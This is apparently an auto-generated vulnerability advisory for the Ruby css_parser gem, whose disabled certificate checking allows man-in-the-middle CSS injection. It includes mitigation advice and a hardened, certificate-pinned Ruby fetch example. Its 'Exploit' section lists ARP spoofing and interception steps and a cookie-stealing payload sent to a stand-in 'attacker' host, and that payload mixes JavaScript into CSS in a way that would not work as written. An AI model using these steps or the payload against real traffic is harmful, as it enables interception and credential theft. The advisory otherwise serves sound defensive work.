How the CVE works (technical details):
The CSS Parser gem disables HTTPS certificate validation by setting `http.verify_mode = OpenSSL::SSL::VERIFY_NONE` in `lib/css_parser/parser.rb` (line 646). With this setting any SSL/TLS certificate, including a self-signed, expired, or maliciously crafted one, is accepted without checking its authenticity or chain of trust. When an application uses this gem to fetch remote CSS over HTTPS, the underlying `Net::HTTP` client does not verify the server's certificate.

An attacker in a Man-in-the-Middle position (e.g., on the same network or controlling a rogue access point) can intercept the HTTPS request. The attacker presents a fraudulent certificate, which the client blindly trusts. The attacker then modifies the CSS response body, injecting malicious rules, overriding existing styles, or exfiltrating data via CSS selectors. The modified CSS is parsed and used by the application as if it were legitimate. No error or warning is raised because `VERIFY_NONE` suppresses all certificate validation failures.

This effectively downgrades HTTPS to plain HTTP in terms of security, breaking the confidentiality and integrity guarantees of TLS. The vulnerability exists in all versions before the patch. The issue is triggered whenever `CssParser::Parser#load_uri!` or a similar method fetches an `https://` URL. The attack requires no user interaction and succeeds silently.
<h2 style="color: blue;">dailycve form:</h2>
Platform: Ruby css_parser
Version: Up to 1.7.0
Vulnerability: MITM CSS injection
Severity: Medium
Date: 2023-03-24
<h2 style="color: blue;">Prediction: Patched in 1.7.1</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check for vulnerable verify_mode setting
grep -n "VERIFY_NONE" "$(bundle show css_parser)/lib/css_parser/parser.rb"
Test with curl using a malicious proxy
curl -x http://malicious-proxy:8080 --proxy-cacert fake.pem \
https://example.com/style.css -v
Ruby one-liner to simulate disabled verification
ruby -rnet/http -ropenssl -e '
http = Net::HTTP.new("example.com", 443)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
puts http.get("/style.css").body
'
<h2 style="color: blue;">Exploit:</h2>
1. Position attacker on network between target and CSS server (ARP spoofing, rogue Wi-Fi).
2. Run mitmproxy with `--set ssl_insecure=true` to intercept HTTPS.
3. When the target Ruby app loads `https://trusted-cdn.com/theme.css`, the proxy intercepts the request.
4. Inject malicious CSS: `body{background:url('http://attacker/steal?cookie='+document.cookie)}`
5. Vulnerable gem accepts self-signed proxy certificate and returns injected CSS.
6. App renders/modifies pages using attacker-controlled styles.
Protection from this CVE
- Upgrade to css_parser >= 1.7.1 (which sets `VERIFY_PEER`).
- Manually override verify_mode: `http.verify_mode = OpenSSL::SSL::VERIFY_PEER` in custom wrappers.
- Use `CssParser::Parser#load_uri!` only with local or pinned HTTPS certificates.
- Implement certificate pinning or use a secure HTTP client (e.g., `Faraday` with strict SSL).
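Added example of the hardened fetch the Protection list describes (not the gem's own code): verification stays at `VERIFY_PEER` against the system CA store, and an optional SPKI pin gives the "pinned HTTPS certificates" item a concrete form. The names `secure_http_for`, `pin_check`, `fetch_css` and `demo_certificate`, the pin callback and the self-signed fixture are assumptions of this example, not part of css_parser.

```ruby
require "net/http"
require "openssl"
require "digest"

# Base64 SHA-256 of the certificate's DER-encoded public key (an SPKI pin).
def spki_pin_for(cert)
  [Digest::SHA256.digest(cert.public_key.to_der)].pack("m0")
end

# Pure check behind the verify callback: the chain must already have passed
# (preverify_ok) and only the leaf certificate (depth 0) is compared to the pin.
def pin_check(preverify_ok, depth, cert, pin_sha256)
  return preverify_ok unless depth.zero?
  preverify_ok && spki_pin_for(cert) == pin_sha256
end

# Net::HTTP client for an https:// URI with verification left on: VERIFY_PEER against
# the system CA store (what the gem replaced with VERIFY_NONE) plus an optional SPKI pin.
def secure_http_for(uri, pin_sha256: nil)
  raise ArgumentError, "https:// URIs only" unless uri.scheme == "https"
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_PEER
  http.cert_store = OpenSSL::X509::Store.new.tap(&:set_default_paths)
  if pin_sha256
    http.verify_callback = lambda do |ok, ctx|
      pin_check(ok, ctx.error_depth, ctx.current_cert, pin_sha256)
    end
  end
  http
end

# Fetch a stylesheet; a forged or unpinned certificate now raises OpenSSL::SSL::SSLError.
def fetch_css(url, pin_sha256: nil)
  uri = URI(url)
  secure_http_for(uri, pin_sha256: pin_sha256).get(uri.request_uri).body
end

# Throwaway self-signed certificate (constructed fixture) so the pin logic runs offline.
def demo_certificate
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version, cert.serial = 2, 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse("/CN=example.test")
  cert.public_key = key.public_key
  cert.not_before, cert.not_after = Time.now, Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  cert
end
```

With a pin set, a proxy that substitutes its own certificate fails at the leaf even if it somehow passes chain validation, and the failure surfaces as an exception rather than as silently accepted CSS.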
Impact
- Arbitrary CSS injection into application’s rendered output.
- Defacement, phishing overlays, or extraction of sensitive data via CSS `url()` and `@import`.
- Bypass of HTTPS integrity and confidentiality for all remote stylesheets.
- Silent MITM attacks with no logging or error indication.
Sources:
Reported By: github.com